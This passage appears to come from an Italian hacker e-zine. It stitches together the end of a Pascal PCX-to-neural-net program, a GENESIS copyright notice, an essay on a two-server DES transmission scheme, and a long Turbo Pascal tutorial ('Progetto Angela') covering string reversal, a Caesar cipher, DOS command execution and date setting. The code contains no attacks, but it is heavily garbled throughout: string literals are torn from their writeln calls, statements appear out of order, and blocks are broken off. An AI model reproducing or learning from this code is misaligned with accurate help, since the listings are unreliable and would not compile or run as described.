ViewInfo.x2 DO begin FOR Y := YPt to (YPt + 7) DO begin FOR X := XPt to (XPt + 7) DO begin PixelStatus := GetPixel(X,Y); IF PixelStatus = 0 THEN write(F,'.') ELSE write(F,'X'); end; writeln(F); end; YPt := RowPt; XPt := XPt + 8; end; XPt := 0; RowPt := RowPt + 8; YPt := RowPt; end; end; Close(F); end; Dispose(SPort,done); end; { pcx_to_neural_net} begin { program body } pcx_to_neural_net; New(NNI, init); WITH NNI^ DO begin SwapVectors; exec('C:\COMMAND.COM','/C C:\BATCH\net'); SwapVectors; IF DosError <> 0 THEN Writeln('Dos error # ',DosError) ELSE Get_weights; Output_characters; Dispose(NNI, done); end; end. ***************************************************************************** ** ED ORA I GIUSTI COPYRIGHT: {now the right copyright} ** GENESIS; Neural Systems Simulator ** ** Written by: Matt A. Wilson ([email protected]) ** Upinder S. Bhalla ([email protected]) ** John D. Uhley ([email protected]) ** David H. Bilitch ([email protected]) ** Mark E. Nelson ([email protected]) ** James M. Bower ([email protected]) ** ** HELIOS compatibility modifications by :** ** Michael D. Speight ([email protected]) ** ** X11R4 upgrade modifications by:** ** Randall D. Smith ([email protected]) ** ** Copyright 1988, 1989 and 1990 by the California Institute of Technology ** ** Permission to use, copy, modify, and distribute this ** software and its documentation for any purpose and without ** fee is hereby granted, provided that the above copyright ** notice appear in all copies and that both that copyright ** notice and this permission notice appear in supporting ** documentation, and that the name of the California Institute ** of Technology not be used in advertising or publicity pertaining ** to distribution of the software without specific, written prior ** permission. The California Institute of Technology makes no ** representations about the suitability of this software for any purpose. ** It is provided "as is" without express or implied warranty. ** ***************************************************************************** Continuiamo nel nostro lungo cammino e procediamo all'analisi di un altro interessante idea che mi e' venuta in mente e che sto sperimentando con alcuni amici [mit uni forever] allora come bhe sappiamo dicendola semplice un sistema sicuro di trasmissione non esiste e credo mai esistera' e il des ormai e' diventato vecchio e obsoleto non piu' in grado di reggere i tool e gli apperecchi hardware che in pochi giorni rendono facile la decodifica di questo algoritmo . Bhe cavolo come si puo' allora stare sicuri in questa rete .. Bhe un hacker direbbe meglio cosi' e' comodo ... ma sto tentando essere dalla parte dei sysadmin piu'bravi e dei ricercatori . Prima di tutto un sitema sicuro di trasmissione com gia' visto si basa sulla trasmissione su due canali da due apparecchi diversi come avviene per gli usa e la russia che utilizzano aerei a distanza specificate per trasferire importanti informazioni attraverso aerei che con l'apparecchiatura fornitale utilizzano due canali : uno per la trasmissione del codice ed uno per le informazzioni una volta verificato il codice stesso . Bhe pensiamo di volere fare la stessa cosa sulla rete ... ci ho riflettuto e non e'facile ma non impossibile... e sarebbe fattibile allora sviluppiamo il modo e il codice per procedere. Di che abbiamo bisogno , prima di tutto di due server dedicati al compito su alta connettivita' [t3 o t1] entrambi devono avere solo 3 porte aperte : la prima ad esempio telnet nel quale l'utente inserisce le informazioni e ovvimanete il codice di algoritmo [des al momento ] e i ovviamente il suo login / passwd [magari anke altre informazioni personali durante il logon che solo il server conosce ... possibilissimo da implementare] Bhe dopo questa operazione iniziale il server procede al salvataggio dei dati su memoria di massa [hd] e procede alla sec fase. la seconda porta serve al trasferimento del codice del server all'altro server che la verifica e poi all'invio del codice utente che l'utente destinatario del messaggio dovra'ricevere .Ora il passaggio codice e' completo Il server procedera'ora' a aprire su un porta random che sara' comunicata al software dell'utente che invia il messaggio e a quello che lo riceve. Il messaggio inviato verra'cmq criptato in des e inviato al destinatario Il server chiudera'ovvimante la porta aperta e cancellera'il codice dala memoria di massa. PROBLEMI A CUI E' DIFFICILE PROVVEDERE: n.1 il codice utilizzato e' des n.2 il tempo [lo scambio deve avvenire in tempo reale tra i due server ma anche tra i due utenti ... il server potra' accettare solo un utente e non piu' di uno per motivi legati ovviamente alla sicurezza] n.3 la connessione tra i due server deve essere diretta e non passare per altri pc altrimenti il fattore sicurezza e' zero. IDEE CONSEGUITE: per la n.3 internet e' difficle per la sua implementazione ma possibile attraverso strutture adeguate [vedi P30000 hehehehe magari] .... per la n.1 make another codez zcools .... HahAha not a good idea i think that is more good than a codez that i can do HahAha..... per la n.2 bhe questo secondo me e' giusto e credo che se anke puo' causare disguidi aiuti in maniera forte la sicurezza... non avete tempo aspettare che la vs spia di fiducia si colleghi allora cavoli vostri hehehe. ZeroCool ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ PROGETTO ANGELA : OVVERO COME BUTTARE IL TEMPO ;) ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Ed ecco a voi il miglior coder, il pluripremiato e invidiato programmatore, il pluriricercato da Bill GAYtes, il mitico crackatore... ...hihihi... ...ci avevate creduto... ...e invece no...sono sempre io...io chi? ...continuate a leggere e lo saprete presto... Salve a tutti questo e' il vostro N0bodY88 che vi scrive questa diciamo minidescrizione di alcune parti del codice che potete trovare tra gli allegati sotto il nome di angela.pas (sera :). Questo programma da me fatto non centra un benemrito caxxo con l'hacking ma almeno centra un po' con la crittografia e soprattutto la programmazione. Siccome il programma e' lungo (a sproposito imo) ho pensato di spiegare solo le parti non intuibili (alla prima okkiata) e anke se so che molti rideranno di questa mia "creazione" io so che hacking e' uno stato mentale e implica creativita' e tanta immaginazione quindi....immaginate che sia un bel programma fatto da un creativo (pensate che rido di me perfino io stesso hihihi). Allora il primo spezzone che prenderemo in esame sara' quello utile (?) al capovolgimento di una frase e/o una parola. Per capovolgere una frase uso un semplice algoritmo che consiste nel leggere la lunghezza della frase con la funzione Length, dopodiche' si fa un ciclo che va da 1 alla lunghezza totale della frase e assegniamo a una nuova variabile azzerata prima del ciclo (x evitare problemi se si riusa questa parte del programma) una alla volta tutte le lettere, gli spazi e i numeri assegnando prima l'ultima lettera, poi la penultima, poi la terzultima e cosi' via. Per ottenere questo basta che alla lunghezza totale togliamo la I che da 1 andra' in crescendo. Alla fine non ci rimarra altro da fare che stampare la nostra nuova variabile contenente tutti i valori della frase di 'capov', solo che...capovolti :) --- INIZIO CODICE --capov:=''; olta:=''; GotoXY(10,10); writeln ('Scrivi la frase da capovolgere. '); GotoXY(10,12); readln (capov); J:=length(capov); olta:=''; FOR I:=1 TO J DO BEGIN olta:=olta+capov[j-I]; END; GotoXY(10,15); writeln ('La frase capovolta e'': ',capov[J]+olta); GotoXY(10,17); readln; --- FINE CODICE --La seconda funzione di angela e' semplicissima e serve x crearsi un nuovo alfabeto derivante da quello tradizionale. In pratica cio' che ho fatto e' stato richiedere un numero compreso tra 1 e 26 e riempire un array con le stesse caratteristiche di quello contenente le 26 lettere dell'alfabeto con un criterio dato dal numero ottenuto in input. Se ad esempio io inserisco il numero 4 il sotto-programma mi sposta nel secondo array prima le lettere dal numero scelto, quindi dal 4ø, fino al 26ø poi successivamente vi aggiungeva le lettere che andavano dalla A fino al numero scelto meno uno (4-1). In questa maniera noi possiamo cioe' crearci un alfabeto nuovo nuovo da poter usare in un ns futuro programma di criptazione. --- INIZIO CODICE --begin clrscr; GotoXY(10,10); writeln ('Dammi un numero da 1 a 26 '); GotoXY(10,12); readln (X); for I:=1 to (26-X+2) do begin data2[I-1]:=data1[I+X-2]; end; for I:=1 to (X-1) do begin data2[I+26-X]:=data1[I-1]; '); scelto: '); end; GotoXY(10,16); writeln ('Vediamo come sarebbe l''alfabeto se GotoXY(10,17); writeln ('iniziasse x la lettera che hai GotoXY(10,20); for I:=1 to 26 do begin write (data2[I-1]); end; readln; end; --- FINE CODICE --Qui non c'e' nulla da spiegare ho solo utilizzato il comando FindFirst passandogli come argomenti una lista di file (prima .EXE e poi .PAS). Per maggiori informazioni cercate FindFirst nella guida di TP. --- INIZIO CODICE --begin clrscr; GotoXY(1,5); writeln ('ELENCO FILE .EXE: '); FindFirst('*.EXE', Archive, DirInfo); GotoXY(1,7); while DosError = 0 do begin Writeln(DirInfo.Name); FindNext(DirInfo); end; readln; clrscr; GotoXY(1,5); writeln ('ELENCO FILE .PAS: '); FindFirst('*.PAS', Archive, DirInfo); GotoXY(1,7); while DosError = 0 do begin Writeln(DirInfo.Name); FindNext(DirInfo); end; readln; end; --- FINE CODICE --Questo spezzone utilizza la funzione Randomize e serve (se non l'avete ancora capito =) a scegliere una lettera a caso. Il programma randomizza la variabile I da 1 a 26 e mostra la lettera estratta continuamente cambiandola con un altra sempre random fino a che (per fermarsi su una delle lettere "casuali") utilizziamo la forma "until KeyPressed" cioe mostriamo le lettere finche' non viene premuto un qualsiasi tasto. Stupida cosa che potbbe tornare utile ai novelli e/o futuri programmatori. --- INIZIO CODICE --begin clrscr; GotoXY(10,8); write ('Per fermare e vedere la lettera random schiacciare la barra'); Randomize; repeat begin GotoXY(10,10); I:=random(26); write ('La lettera estratta a caso risulta essere la ',data1[I]); end; until KeyPressed; readln; end; --- FINE CODICE --Semplice e inutile programmino che memorizza una frase x poi cancellarne una parte da noi delimitata. Esempi noi scriviamo una frase tipo caio maz! 123456789 poi diciamo che vogliamo cancellare dalla parola le lettere dalla 3 alla 7. Il risultato sara' quindi caz! 1234 Come dicevo all'inizio inutile...forse...di sicuro...mah...chissa'... --- INIZIO CODICE --begin clrscr; GotoXY(10,6); writeln ('Scrivi una frase di almeno tre parole: '); GotoXY(10,8); readln (canc); repeat GotoXY(10,10); writeln ('Dammi un numero minore della lunghezza della frase: '); GotoXY(10,12); readln (I); until I<Length(canc); repeat GotoXY(10,14); writeln ('Dimmi quante lettere cancellare: '); GotoXY(10,16); readln (J); until (j<(length(canc)-I)); Delete(canc,I,J); GotoXY(10,18); Writeln('La frase con le lettere tolte risulta essere: '); GotoXY(10,20); Writeln(canc); readln; end; --- FINE CODICE --E mentre Dante qui accanto a me va in delirio perche' leggendo una e-zine americana ha trovato un errore di allinemanto io vo avanti...il seguente pezzo di codice affronta un problema che mi era stato presentato da un amico che non sapeva programmare e che diceva che io ero bravo, dato che sapevo lo accatiemmeelle....cmq a parte le premesse lo scopo di tal agglomerato di codice e' di contare in una frase le vocali, le consonanti, le maiuscole, le minuscole, i numeri e gli spazi. Anke questo e' fatto solo x vedere come affrontare un problema di questo genere ma come qualsiasi problema basta pensarci nu poco su e poi andare giu' di nobotesting (come la chiamo la fase in cui io testo i miei prog del cax). --- INIZIO CODICE --begin clrscr; voc:=0; cons:=0; maiusc:=0; minusc:=0; spazi:=0; numfrase:=0; GotoXY(10,6); writeln ('Scrivi una frase: '); GotoXY(10,8); readln (frase); for i:=1 to (length(frase)+1) do begin for j:=1 to 5 do begin if ((frase[i-1])=vocali[J-1]) then begin voc:=voc+1; minusc:=minusc+1; end; if ((frase[i-1])=(upcase(vocali[J-1]))) then begin voc:=voc+1; maiusc:=maiusc+1; end; end; if ((frase[i-1])=' ') then begin spazi:=spazi+1; end; for x:=1 to 10 do begin if ((frase[i-1])=numeri[x-1]) then begin end; then numfrase:=numfrase+1; end; end; for i:=1 to (length(frase)+1) do begin for J:=1 to 21 do begin if (frase[i-1]=consonanti[J-1]) then begin cons:=cons+1; minusc:=minusc+1; end; if ((frase[i-1])=(upcase(consonanti[J-1]))) begin end; ',voc); sono ',cons); ',maiusc); ',minusc); ',spazi); ',numfrase); end; --- FINE CODICE --- end; cons:=cons+1; maiusc:=maiusc+1; end; GotoXY(10,11); writeln ('Le vocali nella tua frase sono GotoXY(10,12); writeln ('Le consonanti nella tua frase GotoXY(10,13); writeln ('Le maiuscole nella tua frase sono GotoXY(10,14); writeln ('Le minuscole nella tua frase sono GotoXY(10,15); writeln ('Gli spazi nella tua frase sono GotoXY(10,16); writeln ('I numeri nella tua frase sono GotoXY(10,18); readln; In queste poche righe che seguono viene richiesta l'immissione di una qualsiasi lettere, numero, simbolo, carattere o insieme di caratteri i quali una volta immessi andranno a riempire lo schermo fino a che noi non pigieremo un qualsiasi tasto (con la funzione gia' descritta sopra "until keypressed"). Tipico esempio del ciclo (quasi) infinito (anke se da questo si esce ;). Le due combinazione consigliate rendono lo schermo una scacchiera su cui si puo' giocare benissimo a scacchi se solo avete abbastanza pedine per riempire anke solo una fila... --- INIZIO CODICE --begin clrscr; GotoXY(10,10); writeln ('Scrivi quello che vuoi: '); GotoXY(10,12); writeln ('[ Se vuoi un consiglio prova a scrivere solo ALT+206 o ALT+197 ]'); GotoXY(10,14); readln (quellochevuoi); repeat write (quellochevuoi); until keypressed; end; --- FINE CODICE --Questa funzione permette di eseguire un programma con alcuni parametri anke se non molte volte mi e' andato a buon fine, nonostante il codice sia (credo) pulito. --- INIZIO CODICE --begin clrscr; GotoXY(10,10); GotoXY(10,12); GotoXY(10,14); '); GotoXY(10,16); writeln('Programma da eseguire: '); readln (prog); write('Parametri da passare al programma ',prog,' : readln(par); fine.'); GotoXY(10,18); writeln('Adesso vediamo se funziona...'); SwapVectors; Exec(prog,par); SwapVectors; clrscr; GotoXY(10,10); writeln ('...speriamo sia andato tutto a buon if (doserror<>0) then begin GotoXY(10,12); writeln('Numero di errore di dos: ',DosError); end else begin GotoXY(10,14); writeln('Esecuzione andata a buon fine...forse.'); end; readln; end; --- FINE CODICE --Siccome nella funzione sopra qualcosa puo' non funzionare e puo' esserci dato in output un errore di dos soot forma di numero o pensato di mettere nella opzione successiva una lista dei + comuni errori del dos con una breve e credo intuibile spiegazione. --- INIZIO CODICE --begin clrscr; GotoXY(10,3); SPIEGAZIONI '); GotoXY(10,6); GotoXY(10,7); GotoXY(10,8); GotoXY(10,9); GotoXY(10,10); GotoXY(10,11); GotoXY(10,12); GotoXY(10,13); GotoXY(10,15); perche'' il '); GotoXY(10,16); riportare degli '); GotoXY(10,17); altro e cosi'' '); GotoXY(10,18); perche'' non funzia.'); GotoXY(10,20); end; --- FINE CODICE --- writeln (' LISTA ERRORI DOS E LORO writeln writeln writeln writeln writeln writeln writeln writeln writeln (' 2 (' 3 (' 5 (' 6 (' 8 ('10 ('11 ('18 ('Ho --> File not found '); --> Path not found '); --> Access denied '); --> Invalid handle '); --> Not enough memory '); --> Invalid environment '); --> Invalid format '); --> No more files '); voluto mettere questa lista writeln ('programma scelto con l''8 puo'' writeln ('errori dovuti a poca memoria o writeln ('da questa lista potete capire readln; !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! QUESTA FUNZIONE VIENE ESEGUITA SENZA PROBLEMI SOLO SE IL FILE ANGELA E' CONTENUTO NELLA DIRECTORY C:\WINDOWS\COMMAND [se in modalita' windows] O NELLA DIRECTORY C:\DOS [se in modalita' dos] ... O ALMENO CREDO =) !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Ovviamente ogni buon consiglio atto a migliorare il prog e la mia conoscenza stessa e' mooooooooooolto ben accetto, come le critiche d'altronde. --- INIZIO CODICE --begin clrscr; GotoXY(10,10); writeln ('Dammi il comando dos che vuoi eseguire: '); GotoXY(10,12); readln (comando); if (comando<>'') then begin comando:='/C ' + comando; swapvectors; exec(getenv('COMSPEC'), comando); swapvectors; if (DosError<>0) then begin GotoXY(10,14); writeln ('Non si riesce a far eseguire command.com'); GotoXY(10,16); readln; end end; readln; end; --- FINE CODICE --Questa "utility" (uaaaaaaaaahahahhaha) mostra le linee del tuo dos caricate in memoria nel momento dell'esecuzione del programma angela. --- INIZIO CODICE --begin clrscr; for i:=1 to envcount do writeln(envstr(i)); readln; end; --- FINE CODICE --Con questo pezzo si puo' leggere la data odierna e cambiarne il giorno il mese e l'anno (ovviamente...direte voi :DDDDDDDD). --- INIZIO CODICE --begin clrscr; getdate(anno,mese,giorno,ggsettimana); GotoXY(10,6); writeln('Oggi e'' esattamente ',giorni[ggsettimana],' ',giorno:0, '/', mese:0, '/', anno:0); GotoXY(10,8); readln; anno:=0; mese:=0; giorno:=0; GotoXY(10,10); writeln ('Vuoi cambiare la data ? (S/N o s/n)'); GotoXY(10,12); readln (risposta); if (risposta='s') or (risposta='S') then begin clrscr; GotoXY(10,3); writeln ('ATTENZIOME se immettete dati errati la data non variera''.'); GotoXY(10,5); writeln ('Dammi il nuovo giorno in numeri : '); GotoXY(10,7);readln (giorno); GotoXY(10,9); writeln ('Dammi il nuovo mese in numeri: '); GotoXY(10,11);readln (mese); GotoXY(10,13); writeln ('Dammi il nuovo anno in numeri: '); GotoXY(10,15);readln (anno); setdate(anno,giorno,mese); GotoXY(10,17); writeln ('Ora la data e'' impostata sul seguente giorno:'); GotoXY(10,19); getdate(anno,mese,giorno,ggsettimana); writeln(giorni[ggsettimana],' ',giorno:0, '/', mese:0, '/', anno:0); GotoXY(10,21); Readln; end; end; --- FINE CODICE --Stessa cosa della funzione precedente solo che qui si puo' visualizzare e poi eventualmente modificare l'ora, i minuti, i secondi e i centesimi di secondo. --- INIZIO CODICE --begin s/n)'); end; --- FINE CODICE --- clrscr; risposta:='n'; gettime(ore,minuti,secondi,centesimi); GotoXY(10,6); writeln('Adesso sono esattamente le ',leadingzero(ore), ':',leadingzero(minuti),':',leadingzero(secondi), '.',leadingzero(centesimi)); GotoXY(10,8); readln; GotoXY(10,10); writeln ('Vuoi cambiare l''ora ? (S/N o GotoXY(10,12); readln (risposta); if (risposta='s') or (risposta='S') then begin clrscr; GotoXY(10,6); writeln ('Dammi il primo dato: '); GotoXY(35,6); readln (d1); GotoXY(10,8); writeln ('Dammi il secondo dato: '); GotoXY(35,8); readln (d2); GotoXY(10,10); writeln ('Dammi il terzo dato: '); GotoXY(35,10); readln (d3); GotoXY(10,12); writeln ('Dammi il quarto dato: '); GotoXY(35,12); readln (d4); settime(d1,d2,d3,d4); GotoXY(10,14); writeln('Adesso l''ora e'' impostata sulle ' ,leadingzero(ore),':',leadingzero(minuti), ':',leadingzero(secondi),'.',leadingzero(centesimi)); GotoXY(10,16); readln; end; Dal nome stesso della funzione memavail si capisce che tramite essa si puo' vedere la quantita' di memoria available (quindi =disponibile) in un dato momento. --- INIZIO CODICE --begin clrscr; GotoXY(10,10); writeln ('Hai ben ',memavail, ' byte liberi.'); GotoXY(10,12); writeln ('Il blocco libero piu'' grande e'' di ',maxavail,' byte.'); GotoXY(10,14); readln; end; --- FINE CODICE --Il seguente spezzone serve a sommare + numeri pari e + numeri dispari dandone poi un rapporto alla fine (lo so manca la somma di tutti i numeri pari e dispari ma nessuno e' perfetto e alle 1.32 di sabato notte con dante che sta a fianco a scrivere l'altro articolo non mi sento le forze x cercare il cd con su pascal per ricompilarlo e fare il nuovo exe... --- INIZIO CODICE --begin clrscr; x:=5; repeat clrscr; repeat GotoXY(10,3); writeln('Dammi il numero degli addendi: '); GotoXY(10,4); readln (n); until (n>0); I:=0; sommap:=0; sommad:=0; contap:=0; contad:=0; repeat GotoXY(10,x+1); writeln('Dammi un numero da sommare: '); GotoXY(10,x+2); readln(numero); controllo:=numero; x:=x+2; if odd(numero) then begin GotoXY(16,x); writeln ('...questo numero e'' --> Dispari'); end else begin GotoXY(16,x); writeln ('...questo numero e'' --> Pari'); repeat uguale a ',sommap); ',contap); uguale a ',sommad); ',contad); numeri? (S/N o s/n)'); end; controllo:=controllo-2 until (controllo=0) or (controllo=1); if (controllo=0) then begin sommap:=sommap+numero; contap:=contap+1; end else begin sommad:=sommad+numero; contad:=contad+1; end; i:=i+1; GotoXY(10,x+1); until i=n; readln; clrscr; GotoXY(10,4); writeln('La somma dei numeri pari e'' GotoXY(10,5); writeln('I numeri pari sono uguali a GotoXY(10,6); writeln('La somma dei numeri dispari e'' GotoXY(10,7); writeln('I numeri dispari sono uguali a GotoXY(10,9); writeln('Vuoi calcolare la somma di altri GotoXY(10,11); readln(risp); until (risp='n') or (risp='N'); end; --- FINE CODICE --Questa (a seconda di tutti i miei beta-tester...cioe'...secondo me...) e una delle funzioni + belle e consiste esattamente nel mostrare a video tutti i codici ascii e i relativi valori ordinali cosicche' quando vi serve un codice ascii e non sapete dove sbattere la testa ricordatevi di angela... --- INIZIO CODICE --begin clrscr; x:=5; GotoXY(6,3); writeln ('Questa e'' la lista dei codici ascii con relativi valori ordinali: '); for i:=1 to 255 do begin ascii[i]:=(chr(i)); ascii2[i]:=(ord(i)); end; clrscr; for i:=1 to 25 do begin writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=25 to 50 do begin writeln ('Il carattere ascii ',ascii[i],' si puo'' ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=50 to 75 do begin writeln ('Il ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=75 to 100 do begin writeln ('Il ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=100 to 125 do begin writeln ('Il ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=125 to 150 do begin writeln ('Il ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=150 to 175 do begin writeln ('Il ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=175 to 200 do begin writeln ('Il ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=200 to 225 do begin writeln ('Il ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=225 to 250 do begin writeln ('Il ottenere usando ALT+',ascii2[i]); end; readln; clrscr; for i:=250 to 255 do begin writeln ('Il ottenere usando ALT+',ascii2[i]); end; readln; end; --- FINE CODICE --- carattere ascii ',ascii[i],' si puo'' carattere ascii ',ascii[i],' si puo'' carattere ascii ',ascii[i],' si puo'' carattere ascii ',ascii[i],' si puo'' carattere ascii ',ascii[i],' si puo'' carattere ascii ',ascii[i],' si puo'' carattere ascii ',ascii[i],' si puo'' carattere ascii ',ascii[i],' si puo'' carattere ascii ',ascii[i],' si puo'' Piccolo programmino che cripta una frase con il metodo spiegato in un mio precedente articolo sui fondamenti della crittografia (metodo del cifrario additivo puro e semplice) nel quale potete trovare la spiegazione teorica di questo caso. Per la parte pratica poi si usa una semplice sostituzione delle lettere guardando l'indice della lettera in chiaro nell'alfabeto normale e copiandone in un file temporaneo (che conterra' tutta la frase criptata) la lettera equivalente dell'alfabeto da noi scelto e creato tenendo conto dell'indice come dire...esportato dal primo al secondo alfabeto). Per qualsiasi chiarimento sono pronto a rispondere in mail o se ne verra' fatta richiesta (scritta ovviamente hihihi) sul prox numba della e-zinnnne. --- INIZIO CODICE --begin clrscr; GotoXY(10,4); writeln ('Dammi un numero da 1 a 26 '); GotoXY(10,5); readln (X); for I:=1 to (26-X+2) do begin lettere2[I-1]:=lettere[I+X-2]; end; for I:=1 to (X-1) do begin lettere2[I+26-X]:=lettere[I-1]; end; GotoXY(10,7); writeln ('Ora vediamo il confronto tra l''alfabeto normale e'); GotoXY(10,8); writeln ('quello che inizia x la lettera che hai scelto: '); GotoXY(10,9); for I:=1 to 26 do begin write (lettere[I-1]); end; GotoXY(10,10); for I:=1 to 26 do begin write (lettere2[I-1]); end; readln; GotoXY(10,12); writeln ('Ora proviamo a criptare qualcosa. Scrivi una frase'); GotoXY(10,13); readln (cri); nas:=''; c:=0; for i:=1 to Length(cri)+1 do begin for j:=1 to 26 do begin if cri[i-1]=upcase(lettere[j-1]) then begin nas:=nas+(upcase(lettere2[j-1])); end else begin c:=c+1; end; if cri[i-1]=lettere[j-1] then begin nas:=nas+lettere2[j-1]; end else begin c:=c+1; end; if cri[i-1]=' ' then begin nas:=nas+' '; j:=26; end else begin c:=c+1; end; end; if c=78 then begin nas:=nas+cri[i-1]; c:=0; end; c:=0; end; GotoXY(10,16); writeln ('Questa e'' la tua frase/parola criptata col nuovo alfabeto:'); GotoXY(10,18); writeln (nas); nas2:=nas; GotoXY(10,20); readln; end; --- FINE CODICE --Stessa cosa del precedente sotto-mini-programma con la differenza che se prima si criptava un afrse adesso la si decripta... --- INIZIO CODICE --begin clrscr; nas:=nas2; if nas='' then begin GotoXY(8,6); writeln ('Devi eseguire il punto 17 prima di questo punto.'); GotoXY(8,7); readln; end else begin GotoXY(8,3); writeln ('Ora vediamo se riusciamo a decriptare la seguente frase:'); GotoXY(8,5); writeln (nas); GotoXY(8,6); readln; repeat GotoXY(8,8); writeln ('Inserisci un numero con il quale provare a decriptare la frase: '); GotoXY(8,9); readln (x); until (x>0) and (x<27); for I:=1 to (26-X+2) do begin lettere2[I-1]:=lettere[I+X-2]; end; for I:=1 to (X-1) do begin lettere2[I+26-X]:=lettere[I-1]; end; GotoXY(8,11); writeln ('Ora vediamo il solito confronto tra l''alfabeto normale e'); GotoXY(8,12); writeln ('quello che inizia x la lettera che hai scelto: '); GotoXY(8,13); for I:=1 to 26 do begin write (lettere[I-1]); end; GotoXY(8,14); for I:=1 to 26 do begin write (lettere2[I-1]); end; GotoXY(8,15); readln; GotoXY(8,16); writeln ('Ora proviamo a decriptare la frase immessa al punto 17: '); cri:=''; d:=0; for i:=1 to Length(nas)+1 do begin for j:=1 to 26 do begin nas[i-1]=upcase(lettere2[j-1]) then if begin cri:=cri+(upcase(lettere[j-1])); end else begin d:=d+1; end; if nas[i-1]=lettere2[j-1] then begin cri:=cri+lettere[j-1]; end else begin d:=d+1; end; if nas[i-1]=' ' then begin cri:=cri+' '; j:=26; end else begin d:=d+1; end; end; if d=78 then begin cri:=cri+nas[i-1]; d:=0; end else if (d<>78) then begin d:=0; end; end; --- FINE CODICE --- end; end; GotoXY(8,18); writeln (cri); GotoXY(10,19); readln; Sulla prossima parte no comment. --- INIZIO COMMENTO --begin clrscr; GotoXY(8,2); writeln GotoXY(8,3); writeln alcune ore di studio'); GotoXY(8,4); writeln base degli Help che'); GotoXY(8,5); writeln volete dirmi che'); GotoXY(8,6); writeln tempo, l''avreste fatto'); GotoXY(8,7); writeln ditemelo che tanto lo'); GotoXY(8,8); writeln GotoXY(8,9); writeln e la poca, scarsa e complessa'); GotoXY(8,10); writeln libreria Graph non mi funzia quindi...'); GotoXY(8,11); writeln corretto molti degli errori presenti'); GotoXY(8,12); writeln assicuro che non ce ne siano'); GotoXY(8,13); writeln (' NOTE DI N0bodY88'); (' Questo programma e'' frutto di (' del PASCAL fatte solamente sulla (' ci sono in Turbo Pascal, quindi se (' voi ci avreste messo meta'' del (' meglio e senza errori...beh...non (' so gia'' :P '); (' Per quanto riguarda i molti GotoXY (' grafica considerate che la (' Ci tengo a precisare che ho (' sia di codice che di logica ma non (' molti altri eheheh'); GotoXY(8,14); writeln (' gli Spippolatori con in testa'); GotoXY(8,15); writeln (' quelli del NewBies Staff che magari'); GotoXY(8,16); writeln (' e-zine, ai DiB, al S0ftProject con in'); GotoXY(8,17); writeln (' LordFelix, alle BadLands, e in particolar'); GotoXY(8,18); writeln (' che ha fatto per me.'); GotoXY(8,19); writeln (' il suo "Supermercato dell''hacker"'); GotoXY(8,20); writeln (' detto... e'' vero? hihihi)'); GotoXY(8,21); writeln (' ULNTWH99 e ad Alfredo, amici'); GotoXY(8,22); writeln (' un amico trova un tesoro".'); GotoXY(8,23); writeln (' particolare a RigoR MorteM al'); GotoXY(8,24); writeln (' tengo ancora x ricordo...'); GotoXY(8,26); readln; end; --- FINE COMMENTO --- Dedico questo programma a: tutti RigoR MorteM e Jamil, a tutti adesso sono al numero 10 della testa Spirit, Cavallo, Fusys e modo a mia madre per tutto quello Un augurio speciale a Chrome per (si chiama cosi'' mi hanno Infine un ultimo saluto al mitico che confermano il detto "chi trova Un ringraziamento molto quale dico che il pacchetto lo Ora che ho finito questo articolo, Dante e' ancora li' che fa il suo e volevo cogliere l'occasione x dire che...HO FINITO PRIMA IO :PPPPPPPP...hihiihihihi ...e poi io sarei un "maturato"...tnx ai mie prof e un fU‡K alla mia prof di mate che in confronto alien e' bello quanto pamela anderson ;) PS: non scrivetemi x pigliarmi x il culo...bastano gia' quei 30-40 che lo fanno gia' ;) quindi...ah un ultima cosa...ovviamente come al solito ogni consiglio e' ben accetto come qualsiasi critica anke dura tanto dopo aver passato la maturita' ho ricominciato a credere in un dio che...vi punira' tutti ahahahahahhh PSS: dedico questo articolo al mio amico Eugenio il miglior NewBies che conosca (xche' se dico hacker dopo si riprende l'UpLink che m'ha prestato e dopo che ci faccio con ll3???). Un saluto speciale a Federico, a Dante, a DeVilNeT, a RigoR MorteM, a \sPIRIT\ e a tutti quelli che aiutano qualcuno senza chiedere niente in cambio, quindi a tutti quelli che portano avanti tutto il crazy world of internet indipendentemente dal fatto che buchino server o meno e dal fatto che usino linux o windows... Byez N0bodY88 ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ 